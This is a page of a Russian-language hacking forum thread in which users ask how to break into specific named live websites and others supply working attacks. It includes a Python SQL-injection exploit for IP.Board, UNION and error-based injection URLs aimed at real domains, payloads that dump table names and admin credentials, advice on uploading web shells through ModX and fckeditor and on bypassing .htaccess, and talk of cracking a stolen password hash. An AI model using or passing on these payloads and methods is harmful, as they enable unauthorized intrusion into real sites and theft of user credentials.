PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 [5] 6 7 8 9 10 11 12

Sensoft
16.01.2016, 14:57
В общем пытаюсь взломать движок IPB

С помощью эксплоита как называется эксплоит не знаю но нашёл на форуме "IPB версии 3.4.7 и меньше"

Там скрипт. при запуски скрипта у меня вылетает ошибка

Мне интересно с чем она связана

Вставлял разные сайты

Скрипт такой

.SpoilerTarget" type="button">Spoiler: Скрипт
#!/usr/bin/env python

# Sunday, November 09, 2014 - secthrowaway () safe-mail net

# IP.Board - http://sourceforge.net/projects/socksipy/

#import socks, socket

#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)

#socket.socket = socks.socksocket

# import urllib2, urllib

def inject(sql):

try: urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua})) except urllib2.HTTPError, e:

if e.code == 503: data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read() txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE)

if txt is not None:

return txt.group(1) sys.exit('Error [3], received unexpected data:\n%s' % data) sys.exit('Error [1]') sys.exit('Error [2]') def get(name, table, num): sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num) s = int(inject('LENGTH((%s))' % sqli))

if s

http://s019.radikal.ru/i600/1601/22/c2a9892ef69f.png

psihoz26
16.01.2016, 15:38
nik1201 said:
↑ (https://antichat.live/posts/3939690/)
Подскажите что можно сделать с этим? когда я вместо ника пишу
Вот ошибка
SQL: INSERT INTO pre_ucenter_members(uid,username,password,email,my id,myidkey,regip,regdate,lastloginip,lastlogintime ,salt,secques) VALUES (28472, ' ', '000', 'none', '', '', '', 1452657744, '0', '0', '111', '')
Error: Duplicate entry ' Errno.: 1062
Там кстати вместо ника если хоть что напишешь,то код вместо ника выполнятся будет,можно что бы простая кнопка была вместо ника)))


По ошибке видно что есть внедрение в insert запрос проверьте фильтрацию кавычек если отсутствует то можно крутить как error based

compass
16.01.2016, 16:11
Возможно ли обойти двухфакторную аутентификацию?

winstrool
16.01.2016, 17:11
compass said:
↑ (https://antichat.live/posts/3941045/)
Возможно ли обойти двухфакторную аутентификацию?


Да

madam
17.01.2016, 19:03
всем привет,подскажите как правильно подставить запрос,

если быстро 2 раза нажать на ссылку получить кошель blockchain

A Database Error Occurred

Error Number: 1062

Duplicate entry 'hahaha_10056' for key 'id_user'

INSERT INTO `leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');

Filename: /home/misterbit/public_html/modules/wallet/controllers/wallet.php

Line Number: 137

сайт Query

ol1ver
18.01.2016, 02:04
Приветствую.

Чекаю на sql inj. сайт.

Вставляю payload в cookie, сайт - интернет магазин, идентификатор пользователя хранится в cookie переменной (её и чекаю)

Если переменная(идентиф-р) не найден корзина пишет - You have no items.

Сейчас заметил что payload вида...


frontend=79e4b338bee15a3d6ed248041302800c' AND 4050=4050#


канает т.к вывел товары - не фильтрует подумал я.

Как можно раскачать и вывести что мне надо?

Cпасибо!

ArmusIAm
18.01.2016, 02:06
madam said:
↑ (https://antichat.live/posts/3941504/)
всем привет,подскажите как правильно подставить запрос,
если быстро 2 раза нажать на ссылку получить кошель blockchain
A Database Error Occurred
Error Number: 1062
Duplicate entry 'hahaha_10056' for key 'id_user'
INSERT INTO `leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');
Filename: /home/misterbit/public_html/modules/wallet/controllers/wallet.php
Line Number: 137
сайт Query


Ошибка гласит что запись дублируется и вторую такую он создать не может, из этого в принципе ничего не возмешь.

hahaha_10056 это твой логин? Можно проверить на SQL инъекцию, поэкспериментируй с отправляемыми данными, но сам с скулями в INSERT еще не сталкивался, + раскрытие пути.


ol1ver said:
↑ (https://antichat.live/posts/3941654/)
Приветствую.
Чекаю на sql inj. сайт.
Вставляю payload в cookie, сайт - интернет магазин, идентификатор пользователя хранится в cookie переменной (её и чекаю)
Если переменная(идентиф-р) не найден корзина пишет - You have no items.
Сейчас заметил что payload вида...
frontend=79e4b338bee15a3d6ed248041302800c' AND 4050=4050#
канает т.к вывел товары - не фильтрует подумал я.
Как можно раскачать и вывести что мне надо?
Cпасибо!


Перебирай количество колонок: 79e4b338bee15a3d6ed248041302800c order by ..., далее делай запрос типаЖ -79e4b338bee15a3d6ed248041302800c union select 1,2,3 (кол-во столбцов)-- (обрати внимание на отрицательный параметр сессии) и посмотри, есть ли какие либо принтабельные поля, если да то это стандартная SQL инъекция. Если вывода нет, то тогда Blind

winstrool
18.01.2016, 10:58
ArmusIAm said:
↑ (https://antichat.live/posts/3941655/)
сам с скулями в INSERT еще не сталкивался, + раскрытие пути.


Если раскрутить уязвимый параметр, то можно крутить как Error-Based

madam
18.01.2016, 12:23
hahaha_10056 это имя базы данных

ArmusIAm
18.01.2016, 12:32
madam said:
↑ (https://antichat.live/posts/3941753/)
hahaha_10056 это имя базы данных


Сомневаюсь


madam said:
↑ (https://antichat.live/posts/3941504/)
всем привет,подскажите как правильно подставить запрос,
INSERT INTO `leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');


По крайней мере в данном случае hahaha_10056 запишется в поле id_user таблицы leadercoin_address в некой базе данных.

powerOfthemind
18.01.2016, 12:42
Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?

http://s017.radikal.ru/i421/1601/9e/09e795bfbba5.png

Kolyan333
18.01.2016, 13:29
Всем привет, помогите с XSS вот сайт galaxy.mobstudio.ru когда вставляю скрипт для проверки все между скобками фильтр удаляет пример , а если поставить пробел то оставляет, но не смог выполнить алерт никак

PulsarEX547
18.01.2016, 13:47
Всем привет!, у меня вопрос как вывести сразу все таблицы одним запросом?

http://www.site./news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1 --+++ (http://www.dinol.mk.ua/news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1 --+++)

ArmusIAm
18.01.2016, 14:45
Kolyan333 said:
↑ (https://antichat.live/posts/3941774/)
Всем привет,
помогите с XSS вот сайт galaxy.mobstudio.ru когда вставляю скрипт для проверки все между скобками фильтр удаляет пример , а если поставить пробел то оставляет, но не смог выполнить алерт никак


попробуй так


powerOfthemind said:
↑ (https://antichat.live/posts/3941765/)
Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?
http://s017.radikal.ru/i421/1601/9e/09e795bfbba5.png


Не знаю что за ошибка, но по крайней мере в 19 строчке происходит запись в файл, можно попробовать поиграть с $_SERVER переменными (записать туда PHP код, который он запишет в лог файл, а потом подключить его инклудом если LFI есть)

Не могу сказать, прокатит или нет, но имя файла для хранения лога хранится в $file_log, есть вероятность что и ее можно подменить и сохранить лог куда тебе удобно)

winstrool
18.01.2016, 15:00
madam said:
↑ (https://antichat.live/posts/3941753/)
hahaha_10056 это имя базы данных


INSERT INTO `leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');

в данном моменте leadercoin_address является таблицей в текущей БД.


powerOfthemind said:
↑ (https://antichat.live/posts/3941765/)
Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?
http://s017.radikal.ru/i421/1601/9e/09e795bfbba5.png


$file_log, в какой файл пишет? и что в начале файла прописано? есть ли что нить типо die() или exit() в начале файла?


PulsarEX547 said:
↑ (https://antichat.live/posts/3941781/)
Всем привет!, у меня вопрос как вывести сразу все таблицы одним запросом?
http://www.site./news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1 --+++ (http://www.dinol.mk.ua/news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1%20--+++)


в выводимое поле вставте вот это:


(select(@x)from(select(@x:=0x00),(select(0)from(in formation_schema.columns)where(table_schema!=0x696 e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:= concat(@x,0x3c62723e,table_schema,0x2e,table_name, 0x3a,column_name))))x)

ol1ver
18.01.2016, 18:10
ArmusIAm said:
↑ (https://antichat.live/posts/3941655/)
Ошибка гласит что запись дублируется и вторую такую он создать не может, из этого в принципе ничего не возмешь.
hahaha_10056 это твой логин? Можно проверить на SQL инъекцию, поэкспериментируй с отправляемыми данными, но сам с скулями в INSERT еще не сталкивался, + раскрытие пути.
Перебирай количество колонок: 79e4b338bee15a3d6ed248041302800c order by ..., далее делай запрос типаЖ -79e4b338bee15a3d6ed248041302800c union select 1,2,3 (кол-во столбцов)-- (обрати внимание на отрицательный параметр сессии) и посмотри, есть ли какие либо принтабельные поля, если да то это стандартная SQL инъекция. Если вывода нет, то тогда Blind


Можете показать payload на моем примере?Спасибо

sysjuk
18.01.2016, 18:56
Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:

asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6Maj oyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:asd .s1@asd.asd.ua (mailto:asd.s1@asd.asd.ua):/home/asd.s1:/bin/bash

Как я понимаю зашифрован пароль или я ошибаюсь?

Заранее спасибо за ответ.

PulsarEX547
18.01.2016, 21:58
2winstrool, спасибо! запрос сработал без заминок, единственное я бы хотел спросить как называется данный тип sqlinjection? и где можно поподробнее почитать гайдик нормальный по этой теме, для продвинутых если можно так сказать.

ArmusIAm
18.01.2016, 23:32
ol1ver said:
↑ (https://antichat.live/posts/3941885/)
Можете показать payload на моем примере?Спасибо


Для начала перебираешь кол-во колонок, следующим образом:

frontend=79e4b338bee15a3d6ed248041302800c order by 1#

Если отображает товары, значит запрос прошел, идем дальше.

frontend=79e4b338bee15a3d6ed248041302800c order by 5#

Если отображает товары, идем дальше

frontend=79e4b338bee15a3d6ed248041302800c order by 6#

Если в данном случае, не отображает - значит запрос не прошел, соответственно колонок получается 5 (это пример, у тебя по своему должно быть).

Если мы определили кол-во колонок, делаем следующее:

frontend=79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5-- (если у тебя колонок например 7, то до 7 (1,2,3,4,5,6,7))

Если все верно, то ошибки быть не должно, товары в корзине должны отображаться.

И далее:

frontend=-79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5--


Делаем значение frontend отрицательным, что бы посмотреть, если ли принтабельные поля (посмотри, появились ли где нибудь вместо текста циферки, например 1, 2, 4 любые, которых раньше не было.

Если есть, то это обычная инъекция, материала на эту тему много.

Если принтабельных полей нет, то это Blind SQL. Как его использовать тоже статей достаточно.


sysjuk said:
↑ (https://antichat.live/posts/3941899/)
Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:
asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6Maj oyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:
asd.s1@asd.asd.ua (mailto:asd.s1@asd.asd.ua)
:/home/asd.s1:/bin/bash
Как я понимаю зашифрован пароль или я ошибаюсь?
Заранее спасибо за ответ.


Да ты прав, он зашифрован. Говорят программа John The Ripperс этим может справиться.

Успехов!)

Kolyan333
19.01.2016, 00:28
Ниче не помогло

winstrool
19.01.2016, 00:54
PulsarEX547 said:
↑ (https://antichat.live/posts/3941977/)
2winstrool, спасибо! запрос сработал без заминок
, единственное я бы хотел спросить как называется данный тип sqlinjection? и где можно поподробнее почитать гайдик нормальный по этой теме, для продвинутых если можно так сказать
.


/threads/43966/ (https://antichat.live/threads/43966/) -

SQL injection полный FAQ

ArmusIAm
19.01.2016, 01:12
Kolyan333 said:
↑ (https://antichat.live/posts/3942034/)
Ниче не помогло


Бро, ты конечно извини, но я не экстрасенс и не врач. Хочешь чтобы тебе помогли, описывай сложности как можно подробнее

PulsarEX547
19.01.2016, 01:46
winstrool said:
↑ (https://antichat.live/posts/3942050/)
/threads/43966/ (https://antichat.live/threads/43966/)
-
SQL injection полный FAQ


спс, разобрался вроде) делаю финальный запрос:

(select (@x) from (select (@x:=0x00),(select (0) from (admin)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,pass))))x)

в ответ тишина, хотя с других таблиц вывод идет.. может быть просто эти поля в таблице пустые? или я что то непонимаю.... сколько старний аш обидно блин...

kingbeef
19.01.2016, 12:39
PulsarEX547 said:
↑ (https://antichat.live/posts/3942073/)
спс, разобрался вроде) делаю финальный запрос:
(select (@x) from (select (@x:=0x00),(select (0) from (admin)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,pass))))x)
в ответ тишина
, хотя с других таблиц вывод идет.. может быть просто эти поля в таблице пустые? или я что то непонимаю.... сколько старний аш обидно блин...


Попробуй к таблице добавить имя БД, либо уже посмотри, есть в данной таблице записи count(*) from BD.admin

kao
19.01.2016, 12:51
хотел скачать рисунок, а там http авторизация походу. как обойти?

http://naklejka.ru/image/data/naklejki/attributes/bpan-red2.svg

Сорри, если не туда задал вопрос

grimnir
19.01.2016, 14:58
sysjuk said:
↑ (https://antichat.live/posts/3941899/)
Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:
asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6Maj oyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:
asd.s1@asd.asd.ua (mailto:asd.s1@asd.asd.ua)
:/home/asd.s1:/bin/bash
Как я понимаю зашифрован пароль или я ошибаюсь?
Заранее спасибо за ответ.


Да пароль SHA512(Unix) https://en.wikipedia.org/wiki/Passwd#Shadow_file

PulsarEX547
19.01.2016, 15:58
наз


kingbeef said:
↑ (https://antichat.live/posts/3942184/)
Попробуй к таблице добавить имя БД, либо уже посмотри, есть в данной таблице записи count(*) from BD.admin


название бд добавлял, результата недало, а вот посмотреть есть ли там вообще что то было бы неплохо, но я несовсем понимаю как дать такой запрос:?

делаю такой, но он судя по всему неправильный:

?id=-613+union+select+1,COUNT(login,pass) FROM admin,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20 --+

подскажите как задать правильный запрос на проверку записей в полях таблицы?

также хотелось бы отметить что из других таблиц вывод идет как положенно, а тут скорее всего пустота, хотя и очень странно все это)))

ArmusIAm
19.01.2016, 18:21
PulsarEX547 said:
↑ (https://antichat.live/posts/3942278/)
наз
название бд добавлял, результата недало, а вот посмотреть есть ли там вообще что то было бы неплохо, но я несовсем понимаю как дать такой запрос:?
делаю такой, но он судя по всему неправильный
:
?id=-613+union+select+1,COUNT(login,pass) FROM admin,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20 --+
подскажите как задать правильный запрос на проверку записей в полях таблицы?
также хотелось бы отметить что из других таблиц вывод идет как положенно, а тут скорее всего пустота, хотя и очень странно все это)))


?id=-613+union+select+1,COUNT(login,pass),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 FROM admin--+

Если все правильно понял.

Sensoft
19.01.2016, 22:18
Ребят помогите пожалуйста

Считается это уязвимостью ?

Я отправил пост запрос с таким кодом

.SpoilerTarget" type="button">Spoiler: Код
&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
и выдало это

http://s35-temporary-files.radikal.ru/3cff322cfe0a4e038e209830a460de7e/-88693455.png

BabaDook
19.01.2016, 23:22
ребятки, можно тут что-то сделать. ЧТо то там с ' and " не понятно как-то

http://missourimhf.org/view-event.php?id=

kingbeef
20.01.2016, 00:29
BabaDook said:
↑ (https://antichat.live/posts/3942488/)
ребятки, можно тут что-то сделать. ЧТо то там с ' and " не понятно как-то
http://missourimhf.org/view-event.php?id=


Блин, ну это не стоило постить.

http://missourimhf.org/view-event.p...12,13,14,15,16,17,18,19,20--+k&table=schedule (http://missourimhf.org/view-event.php?id=227%27+and+0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+k&table=schedule)

ArmusIAm
20.01.2016, 03:37
Sensoft said:
↑ (https://antichat.live/posts/3942468/)
Ребят помогите пожалуйста
Считается это уязвимостью ?
Я отправил пост запрос с таким кодом
Spoiler: Код
&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
и выдало это
http://s35-temporary-files.radikal.ru/3cff322cfe0a4e038e209830a460de7e/-88693455.png


Нет, обычный массив данных. Могу предположить передается яваскриптом при отправке формы.

BabaDook
20.01.2016, 11:10
kingbeef said:
↑ (https://antichat.live/posts/3942510/)
Блин, ну это не стоило постить.
http://missourimhf.org/view-event.php?id=227'+and+0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20--+k&table=schedule (http://missourimhf.org/view-event.php?id=227%27+and+0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+k&table=schedule)


ну Б*ть, ну 30 минут е++ся , спасибо.

PulsarEX547
21.01.2016, 23:09
Как залить шелл в ModX? пробовал через "елементы", но там некуда заливаться судя по всему, вот что там:

This directory is empty.Directories: 0

Files: 0

Data: 0 B

Directory writable? No.

Есть еще какие варианты? Я слышал через сниппеты, но как? нигде не нашел толковой подробной инфы....

+ Есть возможность добавить пхп код в модуль, я пробовал добавлять , но двиг ругался на CSRF типа его атакуют) как правильно через модуль залится?

Br@!ns
22.01.2016, 04:18
PulsarEX547 said:
↑ (https://antichat.live/posts/3943411/)
Как залить шелл в ModX? пробовал через "елементы", но там некуда заливаться судя по всему, вот что там:
This directory is empty.Directories:
0
Files:
0
Data:
0 B
Directory writable?
No.
Есть еще какие варианты? Я слышал через сниппеты, но как? нигде не нашел толковой подробной инфы....
+ Есть возможность добавить пхп код в модуль, я пробовал добавлять , но двиг ругался на CSRF типа его атакуют) как правильно через модуль залится?


в системных настройках добавь возможность загрузки .php файлов, и через файлменеджер заливай

Kolyan333
22.01.2016, 15:31
Вопрос насчет XSS. Фильтр пускает все, но есть защита , все что между скобок удаляет, и если поставить пробел через скобку тоже пускает, но как вывести алерт не понял. p.s не получилось. пож помогите. сайт скину в ЛС

faza02
22.01.2016, 15:46
Kolyan333 said:
↑ (https://antichat.live/posts/3943628/)
Вопрос насчет XSS.
Фильтр пускает все, но есть защита , все что между скобок удаляет, и если поставить пробел через скобку тоже пускает, но как вывести алерт не понял. p.s не получилось. пож помогите.
сайт скину в ЛС

Kolyan333
22.01.2016, 16:00
yarbabin said:
↑ (https://antichat.live/posts/3943639/)



не получилось (

PulsarEX547
22.01.2016, 19:04
Br@!ns said:
↑ (https://antichat.live/posts/3943494/)
в системных настройках добавь возможность загрузки .php файлов, и через файлменеджер заливай


Ты видел что я написал? там нету директорий в которые можно хоть что то написать, и возможности записи - нет. Тут либо снипеты остаются, либо док менеджер...

RWD
23.01.2016, 17:00
Привет, вообщем нашел fckeditor. как через него залить шелл? может кто сталкивался?

http://i.imgur.com/qpY30Zi.png

faza02
23.01.2016, 18:41
RWD said:
↑ (https://antichat.live/posts/3944029/)
Привет, вообщем нашел fckeditor. как через него залить шелл? может кто сталкивался?
http://i.imgur.com/qpY30Zi.png


https://www.google.ru/search?q=fckeditor+заливка+шелла

jangle
24.01.2016, 15:12
Привет. Помогите раскрутить SQL:


Code:
https://www.sbxchanger.com/feedback.php?p=ok&page=/

RWD
24.01.2016, 20:03
jangle said:
↑ (https://antichat.live/posts/3944331/)
Привет. Помогите раскрутить SQL:

Code:
https://www.sbxchanger.com/feedback.php?p=ok&page=/



не крутиться вроде бы

sergei_petrovish
24.01.2016, 20:34
Здраствуйте, не могу отправить пост форму ajax c сообщением. Проверка на CSRF , сообщение без перезагрузки страницы

Никаких скрытых параметров не передается, может есть какая то особенность в этих форм ?

Код формы


HTML:

Отправить сообщение


Мой код формы автоматической отправки с другого домена


HTML:

document.getElementsByTagName('form')[0].submit();

Sensoft
25.01.2016, 15:29
http://www.bbctop.cc/index.php?act=respons.respons&cid=%27 (http://www.bbctop.cc/index.php?act=respons.respons&cid=%2527)

Как подключится ?

пытался havil1.6 и дампером

не катит

BigBear
25.01.2016, 15:58
Sensoft said:
↑ (https://antichat.live/posts/3944785/)
http://www.bbctop.cc/index.php?act=respons.respons&cid=%27 (http://www.bbctop.cc/index.php?act=respons.respons&cid=%2527)
Как подключится ?
пытался havil1.6 и дампером
не катит


Фильтрация на запятые.


Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+

http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+

Используйте конструкции join

Sensoft
25.01.2016, 16:34
BigBear said:
↑ (https://antichat.live/posts/3944795/)
Фильтрация на запятые.

Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+

http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+

Используйте конструкции join


Чёт не фига не получается

BigBear
25.01.2016, 17:37
Sensoft said:
↑ (https://antichat.live/posts/3944813/)
Чёт не фига не получается


А что вы попробовали?

Покажите запрос.

Sensoft
25.01.2016, 17:48
BigBear said:
↑ (https://antichat.live/posts/3944840/)
А что вы попробовали?
Покажите запрос.


Ты не понял, я не очень шарю в языке php и sql

ArmusIAm
25.01.2016, 21:38
BigBear said:
↑ (https://antichat.live/posts/3944795/)
Фильтрация на запятые.

Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+

Используйте конструкции join


Если не сложно, расскажи более подробно. Очень интересно но сути не уловил.

В принципе, запрос итак проходит (к тому же на первом запросе, запятые по прежнему остаются в запросе?):


Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=27+order+by+10--

Проблема начинается в http://www.bbctop.cc/index.php?act=respons.respons&cid=-27+union+select+1,2,3,4,5,6,7,8,9,10--

Можешь показать на этом примере? Спасибо!

BigBear
25.01.2016, 22:08
ArmusIAm said:
↑ (https://antichat.live/posts/3944937/)
Если не сложно, расскажи более подробно. Очень интересно но сути не уловил.
В принципе, запрос итак проходит (к тому же на первом запросе, запятые по прежнему остаются в запросе?):

Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=27+order+by+10--

Проблема начинается в
http://www.bbctop.cc/index.php?act=respons.respons&cid=-27+union+select+1,2,3,4,5,6,7,8,9,10--
Можешь показать на этом примере? Спасибо!


Потому что запятые. Я это написал ранее. Используйте конструкции без запятых.

(select+1)a join (select+2)b join (select+3)c

Топик называется "Помощь по уязвимостям", а не "Сделай всё за нас".

Мы помогаем, вы анализируете в чём косяк и пытаетесь решить, прикладывая свои решения.

А мы уже исправляем их и направляем в нужное русло.

Стратегия понятна?

winstrool
25.01.2016, 22:14
как пример с join'ом:


http://www.bbctop.cc/index.php?act=...a8+join+(select+9)a9+join+(select +10)a10)+--+ (http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+union+(select+*+from+(select+1)a 1+join+(select+2)a2+join+(select+3)a3+join+(select +4)a4+join+(select+5)a5+join+(select+6)a6+join+(se lect+7)a7+join+(select+8)a8+join+(select+9)a9+join +(select+10)a10)+--+)


Но чето запрос, не проскачил, старею наверное(((

ArmusIAm
25.01.2016, 22:51
BigBear said:
↑ (https://antichat.live/posts/3944952/)
Топик называется "Помощь по уязвимостям", а не "Сделай всё за нас".
Мы помогаем, вы анализируете в чём косяк и пытаетесь решить, прикладывая свои решения.
А мы уже исправляем их и направляем в нужное русло.
Стратегия понятна?


Полностью согласен.


BigBear said:
↑ (https://antichat.live/posts/3944952/)
Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+
Используйте конструкции join


Дело в том, что ты так написал как будто выше - пример, отсюда недопонимание. А так Гугл вообще мой братец)

Filipp
26.01.2016, 12:42
Какая альтернатива null byte в php 5.3.3? Вроде сам null byte пофиксили в 5.3.4

BigBear
26.01.2016, 13:01
Filipp said:
↑ (https://antichat.live/posts/3945147/)
Какая альтернатива null byte в php 5.3.3? Вроде сам null byte пофиксили в 5.3.4


Вроде бы /////[4096]/////

Filipp
26.01.2016, 15:50
BigBear said:
↑ (https://antichat.live/posts/3945154/)
Вроде бы /////[4096]/////


Я сделал таким образом: script.php?go=index.php///...///, дало ошибку, типа невозможно открыть. Но уже в конце расширения не дописывается. Возможно я чего-то делаю не так?

BigBear
26.01.2016, 16:33
Filipp said:
↑ (https://antichat.live/posts/3945208/)
Я сделал таким образом: script.php?go=index.php///...///, дало ошибку, типа невозможно открыть. Но уже в конце расширения не дописывается. Возможно я чего-то делаю не так?


Подбери точное количество слэшей

http://raz0r.name/articles/null-byte-alternative/

https://rdot.org/forum/showthread.php?t=2611

RWD
27.01.2016, 05:28
Привет, подскажите

Есть папка для картинок, в нее загружается php файл, но в htaccess такое. И в итоге шел не работает.


Code:
Options -Indexes

php_value engine off

php_value engine off

winstrool
27.01.2016, 08:54
RWD said:
↑ (https://antichat.live/posts/3945536/)
Привет, подскажите
Есть папка для картинок, в нее загружается php файл, но в htaccess такое. И в итоге шел не работает.

Code:
Options -Indexes

php_value engine off

php_value engine off




Все правильно, php шел в ней работать не будет!

Filipp
27.01.2016, 11:29
BigBear said:
↑ (https://antichat.live/posts/3945247/)
Подбери точное количество слэшей
http://raz0r.name/articles/null-byte-alternative/
https://rdot.org/forum/showthread.php?t=2611


Подобрал что бы было ровно 4096 символов, и все равно ошибка инклуда. Похоже в этой версии этот трюк уже не работает.

faza02
27.01.2016, 12:42
Filipp said:
↑ (https://antichat.live/posts/3945574/)
Подобрал что бы было ровно 4096 символов, и все равно ошибка инклуда. Похоже в этой версии этот трюк уже не работает.


с 5.3 не работает. https://rdot.org/forum/showthread.php?t=343

MDen1s
27.01.2016, 20:19
Пожалуйста,помогите найти таблицу пользователей просмотрел все, но найти почему-то не смог (

http://som.adzu.edu.ph/newsupdates/...5,6 from information_schema.tables limit 97,1 (http://som.adzu.edu.ph/newsupdates/index.php?id=-1%20union%20select%201,unhex%28hex%28table_name%29 %29,3,database%28%29,5,6%20from%20information_sche ma.tables%20limit%2097,1)

R3hab
27.01.2016, 20:37
MDen1s said:
↑ (https://antichat.live/posts/3945801/)
Пожалуйста,помогите найти таблицу пользователей просмотрел все, но найти почему-то не смог (
http://som.adzu.edu.ph/newsupdates/...5,6 from information_schema.tables limit 97,1 (http://som.adzu.edu.ph/newsupdates/index.php?id=-1%20union%20select%201,unhex%28hex%28table_name%29 %29,3,database%28%29,5,6%20from%20information_sche ma.tables%20limit%2097,1)


ее может и не быть, ибо не было бы этой темы /threads/424558/ (https://antichat.live/threads/424558/)

RWD
29.01.2016, 00:08
Подскажите на какие ошибки можно еще проверить?

именно массово. Есть база доменов, проверял на кавычку, и гит. Есть еще какие идеи?

blackbox
29.01.2016, 00:19
RWD said:
↑ (https://antichat.live/posts/3946268/)
Подскажите на какие ошибки можно еще проверить?
именно массово. Есть база доменов, проверял на кавычку, и гит. Есть еще какие идеи?


На вордпресс и джумлу еще, на майдамин незапароленный. А если уязвимости, то выбор тут невелик, по-моему: инклуды, sql, xss. XSS можно снимком экрана проверять, phantomjs такое из-коробки умеет делать, к примеру.

zot123
29.01.2016, 17:20
Заранее прошу прощение за возможный оффтоп, но я уже множество статей и форумов перерыл по поводу темы xss, в том числе и на данном ресурсе.

Пытаюсь разобраться с xss, но никак не удаётся, к тому же многие темы примерно 10-и летней давности и мне кажется, что сейчас многое изменилось, в том числе и уязвимости уже не те. Меня интересует xss и куки в почте. Подскажите свежие темы? Или кто может помочь с этим? Буду очень благодарен, и возможно финансовая благодарность.

Octavian
29.01.2016, 19:44
zot123 said:
↑ (https://antichat.live/posts/3946531/)
Заранее прошу прощение за возможный оффтоп, но я уже множество статей и форумов перерыл по поводу темы xss, в том числе и на данном ресурсе.
Пытаюсь разобраться с xss, но никак не удаётся, к тому же многие темы примерно 10-и летней давности и мне кажется, что сейчас многое изменилось, в том числе и уязвимости уже не те. Меня интересует xss и куки в почте. Подскажите свежие темы? Или кто может помочь с этим? Буду очень благодарен, и возможно финансовая благодарность.


В XSS ничего не изменилось,браузеры фильтруют XSS лучше чем когда то,флаг httponly мешает,инфа если будет то приватно

t0ma5
29.01.2016, 21:14
RWD said:
↑ (https://antichat.live/posts/3945536/)
Привет, подскажите
Есть папка для картинок, в нее загружается php файл, но в htaccess такое. И в итоге шел не работает.

Code:
Options -Indexes

php_value engine off

php_value engine off




попробуй загрузить свой .htaccess

